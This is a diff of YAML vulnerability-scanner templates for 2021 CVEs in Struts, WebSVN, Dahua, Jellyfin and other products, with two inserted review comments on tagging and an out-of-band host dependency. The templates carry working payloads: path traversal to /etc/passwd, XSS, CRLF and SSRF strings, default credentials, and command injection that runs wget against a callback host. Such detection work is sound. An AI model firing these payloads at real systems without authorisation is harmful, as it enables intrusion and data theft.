@@ -1,31 +1,19 @@ id: CVE-2021-28150 - info: - name: Hongdian H8922 3.0.5 - Information Disclosure + name: Hongdian Sensitive Information author: gy741 severity: medium - description: Hongdian H8922 3.0.5 is susceptible to information disclosure. An attacker can access cli.conf (with the administrator password and other sensitive data) via /backup2.cgi and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - remediation: | - Apply the latest security patch or update provided by Hongdian to fix the information disclosure vulnerability (CVE-2021-28150). + description: Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi. reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - - http://en.hongdian.com/Products/Details/H8922 - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 + tags: cve,cve2021,hongdian,exposure classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.5 + cvss-score: 5.50 cve-id: CVE-2021-28150 - cwe-id: CWE-425 - epss-score: 0.00339 - epss-percentile: 0.68228 - cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: hongdian - product: h8922_firmware - tags: cve,cve2021,hongdian,exposure - -http: + cwe-id: CWE-20 +requests: - raw: - | GET /backup2.cgi HTTP/1.1 
@@ -35,21 +23,17 @@ http: GET /backup2.cgi HTTP/1.1 Host: {{Hostname}} Authorization: Basic YWRtaW46YWRtaW4= - matchers-condition: and matchers: + - type: status + status: + - 200 - type: word - part: header words: - "application/octet-stream" - + part: header - type: word - part: body words: - "CLI configuration saved from vty" - "service webadmin" - - - type: status - status: - - 200 -# digest: 4a0a00473045022100fa0bdf9201bd86e6d88f342aabae53d2b1aafa648f3e214c98a4090d5ac3a6540220673403657d2a475765c9ed5b997bfac2b54795b902694187e6872b2fc8ab680e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + part: body diff --git a/poc/cve/CVE-2021-28377.yaml b/poc/cve/CVE-2021-28377.yaml index d55e6fcef0..8577c9fc51 100644 --- a/poc/cve/CVE-2021-28377.yaml +++ b/poc/cve/CVE-2021-28377.yaml @@ -1,9 +1,12 @@ id: CVE-2021-28377 + info: - name: ChronoForums 2.0.11 - Directory Traversal + name: Joomla! ChronoForums 2.0.11 - Local File Inclusion author: 0x_Akoko severity: medium - description: The ChronoForums avatar function is vulnerable through unauthenticated path traversal attacks. This enables unauthenticated attackers to read arbitrary files, for example the Joomla! configuration file which contains credentials. + description: Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials. + remediation: | + Update Joomla! ChronoForums to the latest version (2.0.12) or apply the provided patch to fix the LFI vulnerability. reference: - https://herolab.usd.de/en/security-advisories/usd-2021-0007/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28377 
@@ -12,16 +15,28 @@ info: cvss-score: 5.3 cve-id: CVE-2021-28377 cwe-id: CWE-22 + epss-score: 0.00106 + epss-percentile: 0.43033 + cpe: cpe:2.3:a:chronoengine:chronoforums:2.0.11:*:*:*:*:joomla:*:* + metadata: + max-request: 1 + vendor: chronoengine + product: chronoforums + framework: joomla tags: cve,cve2021,chronoforums,lfi,joomla -requests: + +http: - method: GET path: - "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 +# digest: 490a004630440220773ebed023413af35c4bf60b5473efea8557d6ef58070559446fed4e9cee5fb1022009582d0565e34aed0e473fa33115329edef20ef8d2dca00da3e8c384d7040517:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-28918.yaml b/poc/cve/CVE-2021-28918.yaml index a28e3035b4..d77d0f20f2 100644 --- a/poc/cve/CVE-2021-28918.yaml +++ b/poc/cve/CVE-2021-28918.yaml 
@@ -1,27 +1,42 @@ id: CVE-2021-28918 + info: name: Netmask NPM Package - Server-Side Request Forgery author: johnjhacking severity: critical description: Netmask NPM Package is susceptible to server-side request forgery because of improper input validation of octal strings in netmask npm package. This allows unauthenticated remote attackers to perform indeterminate SSRF, remote file inclusion, and local file inclusion attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. + remediation: | + Upgrade to Netmask version 2.0.0 or later, which includes a fix for this vulnerability. reference: - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md - https://github.com/advisories/GHSA-pch5-whg9-qr2r - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 - https://github.com/rs/node-netmask + - https://rootdaemon.com/2021/03/29/vulnerability-in-netmask-npm-package-affects-280000-projects/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2021-28918 - cwe-id: CWE-20 + cwe-id: CWE-704 + epss-score: 0.02368 + epss-percentile: 0.88659 + cpe: cpe:2.3:a:netmask_project:netmask:*:*:*:*:*:node.js:*:* + metadata: + max-request: 3 + vendor: netmask_project + product: netmask + framework: node.js tags: cve,cve2021,npm,netmask,ssrf,lfi -requests: + +http: - method: GET path: - "{{BaseURL}}/?url=http://0177.0.0.1/server-status" - "{{BaseURL}}/?host=http://0177.0.0.1/server-status" - "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd" + stop-at-first-match: true + matchers-condition: or matchers: - type: word 
@@ -30,8 +45,8 @@ requests: - "Apache Server Status" - "Server Version" condition: and + - type: regex regex: - "root:.*:0:0:" - -# Enhanced by mp on 2022/05/17 +# digest: 4a0a0047304502202491d328e3ffa58331323166e456aa5b9b96635f47069458662271a260790d28022100ac067cc4647598603ecc6d217eca1ae8825a201b8be31500b47669bf2c081e72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-29490.yaml b/poc/cve/CVE-2021-29490.yaml index b9b3a7d41b..cbd4d7446e 100644 --- a/poc/cve/CVE-2021-29490.yaml +++ b/poc/cve/CVE-2021-29490.yaml 
@@ -1,28 +1,41 @@ id: CVE-2021-29490 + info: - name: Jellyfin 10.7.2 SSRF + name: Jellyfin 10.7.2 - Server Side Request Forgery author: alph4byt3 severity: medium - description: Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter. + description: | + Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter. + remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote". reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-29490 - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96 + - https://nvd.nist.gov/vuln/detail/CVE-2021-29490 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 cve-id: CVE-2021-29490 cwe-id: CWE-918 - remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote". 
- tags: cve,cve2021,ssrf,jellyfin -requests: + epss-score: 0.00137 + epss-percentile: 0.48968 + cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: jellyfin + product: jellyfin + shodan-query: http.title:"Jellyfin" + tags: cve,cve2021,ssrf,jellyfin,oast + +http: - method: GET path: - - "{{BaseURL}}/Images/Remote?imageUrl=http://{{interactsh-url}}" - - "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=http://{{interactsh-url}}&ProviderName=TheMovieDB" + - "{{BaseURL}}/Images/Remote?imageUrl=https://oast.me/" + - "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB" + + stop-at-first-match: true matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: body words: - - "http" - -# Enhanced by cs on 2022/02/25 + - "

Interactsh Server

" +# digest: 490a0046304402205ba712405ca9bada81feb2644725cba05bf7071874f9e92e0006353494edc48a02202997f2cc41f43e5d7366478bdf939607a8d23bae2b6b0bddd61a99d5cca81310:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-31249.yaml b/poc/cve/CVE-2021-31249.yaml index 4e4c8cc86d..6dd6e07053 100644 --- a/poc/cve/CVE-2021-31249.yaml +++ b/poc/cve/CVE-2021-31249.yaml 
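Review bot: The only matcher left is a body word match on the `Interactsh Server` banner fetched from the hard-coded `https://oast.me/`, so the verdict depends on that public host being reachable from the target and on its landing page text staying the same. A miss therefore cannot be told apart from the host being down or egress being filtered. The `oast` tag is added in the same hunk although the template no longer uses `{{interactsh-url}}` or `interactsh_protocol`, which may mislead tag-based selection. I would document the dependency above `path:` with `# depends on the public oast.me landing page being reachable from the target; egress-filtered targets will not match`.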
@@ -1,46 +1,23 @@ id: CVE-2021-31249 - info: - name: CHIYU TCP/IP Converter - Carriage Return Line Feed Injection + name: CHIYU TCP/IP Converter devices - CRLF injection author: geeknik + description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter 'redirect' available on multiple CGI components. + reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249 severity: medium - description: CHIYU TCP/IP Converter BF-430, BF-431, and BF-450 are susceptible to carriage return line feed injection. The redirect= parameter, available on multiple CGI components, is not properly validated, thus enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the vulnerability. 
- reference: - - https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249 - - https://www.chiyu-tech.com/msg/message-Firmware-update-87.html - - https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-31249 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N - cvss-score: 6.5 - cve-id: CVE-2021-31249 - cwe-id: CWE-74 - epss-score: 0.00331 - epss-percentile: 0.67922 - cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: chiyu-tech - product: bf-430_firmware tags: cve,cve2021,chiyu,crlf,iot - -http: +requests: - method: GET path: - "{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY" - matchers-condition: and matchers: + - type: status + status: + - 302 - type: word part: header words: - "Location: setting.htm" - "" condition: and - - - type: status - status: - - 302 -# digest: 4b0a00483046022100b9fd992e56cef1cae265c5114bb535a0cf5365eaa7d1e472d707c9eda18227ca022100d2c6f3e7e6534e3b545c881f4608440d05047a3c3c0c6d06aacdd66bf66cf350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-31589.yaml b/poc/cve/CVE-2021-31589.yaml index 1be8932582..3cfe16bdb5 100644 --- a/poc/cve/CVE-2021-31589.yaml +++ b/poc/cve/CVE-2021-31589.yaml 
@@ -1,35 +1,50 @@ id: CVE-2021-31589 + info: - name: BeyondTrust Remote Support Reflected XSS + name: BeyondTrust Secure Remote Access Base <=6.0.1 - Cross-Site Scripting author: Ahmed Abou-Ela severity: medium - description: Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. + description: BeyondTrust Secure Remote Access Base through 6.0.1 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML. + remediation: | + Upgrade to a patched version of BeyondTrust Secure Remote Access Base (6.0.2 or higher) that addresses the XSS vulnerability. + reference: + - https://packetstormsecurity.com/files/165408 + - https://cxsecurity.com/issue/WLB-2022010013 + - https://beyondtrustcorp.service-now.com/csm?sys_kb_id=922d0ab31bc1b490e73854ae034bcb7b&id=kb_article_view&sysparm_rank=1&sysparm_tsqueryId=64fc14ffdb8f70d422725385ca9619cb + - https://www.beyondtrust.com/docs/release-notes/index.htm + - https://nvd.nist.gov/vuln/detail/CVE-2021-31589 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N - cvss-score: 5.4 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2021-31589 cwe-id: CWE-79 + epss-score: 0.00286 + epss-percentile: 0.65338 + cpe: cpe:2.3:o:beyondtrust:appliance_base_software:*:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: beyondtrust + product: appliance_base_software shodan-query: 'set-cookie: nsbase_session' - google-dork: '"BeyondTrust" "Redistribution Prohibited"' - reference: - - https://packetstormsecurity.com/files/165408 - - https://cxsecurity.com/issue/WLB-2022010013 - - https://beyondtrustcorp.service-now.com/csm?sys_kb_id=922d0ab31bc1b490e73854ae034bcb7b&id=kb_article_view&sysparm_rank=1&sysparm_tsqueryId=64fc14ffdb8f70d422725385ca9619cb - tags: cve,cve2021,beyondtrust,bomgar,xss -requests: + 
google-query: '"BeyondTrust" "Redistribution Prohibited"' + tags: xss,packetstorm,cve,cve2021,beyondtrust,bomgar + +http: - method: GET path: - "{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password" + matchers-condition: and matchers: - type: word - case-insensitive: true part: body words: - '' - 'bomgar' + case-insensitive: true condition: and + - type: status status: - 200 +# digest: 4b0a00483046022100ad165a66e5d179b7dcb09eff0e9263182cbe1c89b7901a9b199e9a17f3eb8969022100c7d1d2528a4d707531f925eba15e79e59086b98c55f4c8fb83b9a8952dc81dc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-31682.yaml b/poc/cve/CVE-2021-31682.yaml index 1f8b37310f..9c2b058981 100644 --- a/poc/cve/CVE-2021-31682.yaml +++ b/poc/cve/CVE-2021-31682.yaml 
@@ -1,52 +1,36 @@ id: CVE-2021-31682 - info: - name: WebCTRL OEM <= 6.5 - Cross-Site Scripting + name: WebCTRL OEM - Reflected XSS author: gy741,dhiyaneshDk severity: medium - description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter. - remediation: | - Upgrade to a patched version of WebCTRL OEM that addresses the XSS vulnerability (CVE-2021-31682). + description: The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. This issue impacts versions 6.5 and below. This issue works by passing in a basic XSS payload to a vulnerable GET parameter that is reflected in the output without sanitization. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-31682 - https://github.com/3ndG4me/WebCTRL-OperatorLocale-Parameter-Reflected-XSS - - https://www.automatedlogic.com/en/products-services/webctrl-building-automation-system/ - - http://packetstormsecurity.com/files/164707/WebCTRL-OEM-6.5-Cross-Site-Scripting.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2021-31682 cwe-id: CWE-79 - epss-score: 0.00377 - epss-percentile: 0.69811 - cpe: cpe:2.3:a:automatedlogic:webctrl:*:*:*:*:*:*:*:* + tags: cve,cve2021,webctrl,xss metadata: - max-request: 1 - vendor: automatedlogic - product: webctrl - shodan-query: html:"/_common/lvl5/dologin.jsp" - tags: cve,cve2021,webctrl,xss,packetstorm - -http: + shodan-query: 'html:"/_common/lvl5/dologin.jsp"' +requests: - method: GET path: - '{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E' - matchers-condition: and matchers: + - type: status + status: + - 200 - type: word part: body + condition: and words: - '">' - 'common/lvl5' - condition: and - - type: word part: 
header words: - "text/html" - - - type: status - status: - - 200 -# digest: 4a0a00473045022015a279d56f5bead1ab7474fa6bb6f41c368ba08138e2546358e406ffe635664d022100de056a39b87a383ef5d9973bf583912aa9d0915bbe46a951067e29e626359bce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-31805.yaml b/poc/cve/CVE-2021-31805.yaml index df9a9bb1be..8b70dbaa8d 100644 --- a/poc/cve/CVE-2021-31805.yaml +++ b/poc/cve/CVE-2021-31805.yaml @@ -1,32 +1,21 @@ id: CVE-2021-31805 - info: name: Apache Struts2 S2-062 - Remote Code Execution author: taielab severity: critical description: Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. - remediation: Avoid using forced OGNL evaluation on untrusted user input, and/or upgrade to Struts 2.5.30 or greater which checks if expression evaluation won't lead to the double evaluation. reference: - https://cwiki.apache.org/confluence/display/WW/S2-062 - https://github.com/Axx8/Struts2_S2-062_CVE-2021-31805 - https://nvd.nist.gov/vuln/detail/CVE-2021-31805 - - http://www.openwall.com/lists/oss-security/2022/04/12/6 - - https://security.netapp.com/advisory/ntap-20220420-0001/ + remediation: Avoid using forced OGNL evaluation on untrusted user input, and/or upgrade to Struts 2.5.30 or greater which checks if expression evaluation won't lead to the double evaluation. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-31805 cwe-id: CWE-917 - epss-score: 0.06791 - epss-percentile: 0.93149 - cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: apache - product: struts - tags: cve,cve2021,apache,rce,struts,struts2,intrusive - -http: + tags: cve,cve2021,apache,rce,struts,struts2 +requests: - raw: - | POST / HTTP/1.1 
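Review bot: `intrusive` is dropped from `tags:` while the template still sends the raw POST and matches `root:.*:0:0:` in the response body, so a run that excludes intrusive templates by tag would now include this one. Keep the tag: `tags: cve,cve2021,apache,rce,struts,struts2,intrusive`. The request body sits between this hunk and the next one and is not visible here, so its effect on the target is inferred from the matcher and the description.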
@@ -50,10 +39,10 @@ http: } ------WebKitFormBoundaryl7d1B1aGsV2wcZwF— - matchers: - type: regex part: body regex: - "root:.*:0:0:" -# digest: 4a0a0047304502210096b78f88afbd97efae6bf80b46370105d936cf83b10f852670f9301629265b6d02203daf89471c5da7f540634021310e1d43efcbedc48536f60b849faf0a8535de4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/04/21 diff --git a/poc/cve/CVE-2021-3223.yaml b/poc/cve/CVE-2021-3223.yaml index e2935f0f73..8507a7009f 100644 --- a/poc/cve/CVE-2021-3223.yaml +++ b/poc/cve/CVE-2021-3223.yaml 
@@ -1,50 +1,35 @@ id: CVE-2021-3223 - info: - name: Node RED Dashboard <2.26.2 - Local File Inclusion + name: Node RED Dashboard - Directory Traversal author: gy741,pikpikcu severity: high - description: NodeRED-Dashboard before 2.26.2 is vulnerable to local file inclusion because it allows ui_base/js/..%2f directory traversal to read files. - remediation: | - Upgrade Node RED Dashboard to version 2.26.2 or later to mitigate the vulnerability. + description: Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files. reference: - https://github.com/node-red/node-red-dashboard/issues/669 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223 - https://github.com/node-red/node-red-dashboard/releases/tag/2.26.2 - - https://nvd.nist.gov/vuln/detail/CVE-2021-3223 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-3223 cwe-id: CWE-22 - epss-score: 0.11532 - epss-percentile: 0.94684 - cpe: cpe:2.3:a:nodered:node-red-dashboard:*:*:*:*:*:node.js:*:* metadata: verified: true - max-request: 2 - vendor: nodered - product: node-red-dashboard - framework: node.js shodan-query: title:"Node-RED" fofa-query: title="Node-RED" tags: cve,cve2021,node-red-dashboard,lfi - -http: +requests: - method: GET path: - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd' - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js' - matchers-condition: or matchers: - - type: word - part: body - words: - - "Node-RED web server is listening" - - type: regex part: body regex: - "root:.*:0:0:" -# digest: 490a0046304402202e9724b5de55a2645274dd7e13367a2efbd8c60679ac00089a184aec8090ddca0220562846065a2fb3ec5cfcdd988b4bad30589d3c9529be7ed908122b60935c4e84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - type: word + part: body + words: + - "Node-RED web server is listening" 
diff --git a/poc/cve/CVE-2021-32305.yaml b/poc/cve/CVE-2021-32305.yaml index 5c6c729e5b..d0d5e7eb16 100644 --- a/poc/cve/CVE-2021-32305.yaml +++ b/poc/cve/CVE-2021-32305.yaml @@ -1,9 +1,12 @@ id: CVE-2021-32305 + info: name: Websvn <2.6.1 - Remote Code Execution author: gy741 severity: critical description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter. + remediation: | + Upgrade Websvn to version 2.6.1 or later to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html - https://github.com/websvnphp/websvn/pull/142 @@ -14,18 +17,26 @@ info: cvss-score: 9.8 cve-id: CVE-2021-32305 cwe-id: CWE-78 - tags: cve,cve2021,websvn,rce,oast -requests: + epss-score: 0.96769 + epss-percentile: 0.99586 + cpe: cpe:2.3:a:websvn:websvn:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: websvn + product: websvn + tags: cve,cve2021,websvn,rce,oast,packetstorm + +http: - raw: - | GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Accept: */* + matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# Enhanced by mp on 2022/05/18 +# digest: 4b0a00483046022100805b5332de5210648d6ced01c5406cb8551c2d0c7f41a69bbcd3f23f10093386022100ed0719e61e9ab5d250703abf2fd2e8c5f1064ed7c65d2adeef6fe1e2182936c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-32618.yaml b/poc/cve/CVE-2021-32618.yaml index 1b6f758626..679b5152a5 100644 --- a/poc/cve/CVE-2021-32618.yaml +++ b/poc/cve/CVE-2021-32618.yaml 
@@ -1,28 +1,38 @@ id: CVE-2021-32618 info: - name: Flask Open Redirect + name: Python Flask-Security - Open Redirect author: 0x_Akoko severity: medium - description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com will pass FS's relative URL check however many browsers will gladly convert this to http://example.com. + description: Python Flask-Security contains an open redirect vulnerability. Existing code validates that the URL specified in the next parameter is either relative or has the same network location as the requesting URL. Certain browsers accept and fill in the blanks of possibly incomplete or malformed URLs. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to the latest version of Python Flask-Security library to fix the open redirect vulnerability. 
reference: - https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c - https://github.com/Flask-Middleware/flask-security/issues/486 - https://nvd.nist.gov/vuln/detail/CVE-2021-32618 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-32618 cwe-id: CWE-601 + epss-score: 0.00104 + epss-percentile: 0.42377 + cpe: cpe:2.3:a:flask-security_project:flask-security:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: flask-security_project + product: flask-security tags: cve,cve2021,redirect,flask -requests: +http: - method: GET path: - - '{{BaseURL}}/login?next=\\\example.com' + - '{{BaseURL}}/login?next=\\\interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a004730450221009d58e35269b9bd5391e66fc445890b9c53aab334a1830c102c66190de8db39d402207c328ae59293633603120123faa53d58ccf802a32087d6a4353b43581e34167b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-33044.yaml b/poc/cve/CVE-2021-33044.yaml index 6a8a3d2af4..59c60d4854 100644 --- a/poc/cve/CVE-2021-33044.yaml +++ b/poc/cve/CVE-2021-33044.yaml 
@@ -1,32 +1,22 @@ id: CVE-2021-33044 info: - name: Dahua IPC/VTH/VTO - Authentication Bypass + name: Dahua IPC/VTH/VTO devices Authentication Bypass author: gy741 severity: critical - description: Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. - remediation: | - Apply the latest firmware update provided by Dahua to fix the authentication bypass vulnerability. + description: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. reference: - https://github.com/dorkerdevil/CVE-2021-33044 - https://nvd.nist.gov/vuln/detail/CVE-2021-33044 - https://seclists.org/fulldisclosure/2021/Oct/13 - - https://www.dahuasecurity.com/support/cybersecurity/details/957 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2021-33044 cwe-id: CWE-287 - epss-score: 0.30474 - epss-percentile: 0.96491 - cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: dahuasecurity - product: ipc-hum7xxx_firmware - tags: dahua,cve,cve2021,auth-bypass,seclists + tags: dahua,cve,cve2021,auth-bypass -http: +requests: - raw: - | POST /RPC2_Login HTTP/1.1 @@ -42,6 +32,11 @@ http: matchers-condition: and matchers: + + - type: status + status: + - 200 + - type: word part: body words: @@ -51,15 +46,9 @@ http: - 'session' condition: and - - type: status - status: - - 200 - extractors: - type: regex group: 1 + part: body regex: - ',"result":true,"session":"([a-z]+)"\}' - part: body - -# digest: 4a0a00473045022043730e623d6412b5c4b6c509d7f7713cdc024a7a93fd3872fd78af6245c380dc022100e6a8cbf46005828790d397d9f7ca04344faa72c547c443093ff615f7d89b57ef:922c64590222798bb761d5b6d8e72950 
diff --git a/poc/cve/CVE-2021-33544.yaml b/poc/cve/CVE-2021-33544.yaml index 78779b5b28..ed0ec7d027 100644 --- a/poc/cve/CVE-2021-33544.yaml +++ b/poc/cve/CVE-2021-33544.yaml 
@@ -1,23 +1,42 @@ id: CVE-2021-33544 + info: - name: Geutebruck RCE - description: Multiple vulnerabilities in the web-based management interface of Geutebruck could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + name: Geutebruck - Remote Command Injection author: gy741 - severity: critical - reference: | + severity: high + description: Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + remediation: | + Apply the latest security patches or firmware updates provided by Geutebruck to mitigate the vulnerability. + reference: - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/ - tags: cve,cve2021,geutebruck,rce,oob -requests: + - https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/ + - https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03 + - https://nvd.nist.gov/vuln/detail/CVE-2021-33544 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2021-33544 + cwe-id: CWE-78 + epss-score: 0.9752 + epss-percentile: 0.99986 + cpe: cpe:2.3:h:geutebrueck:g-cam_ebc-2110:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: geutebrueck + product: g-cam_ebc-2110 + tags: cve,cve2021,geutebruck,rce,oast + +http: - raw: - | GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Cache-Control: max-age=0 - Connection: keep-alive + matchers: - type: word part: interactsh_protocol # Confirms the 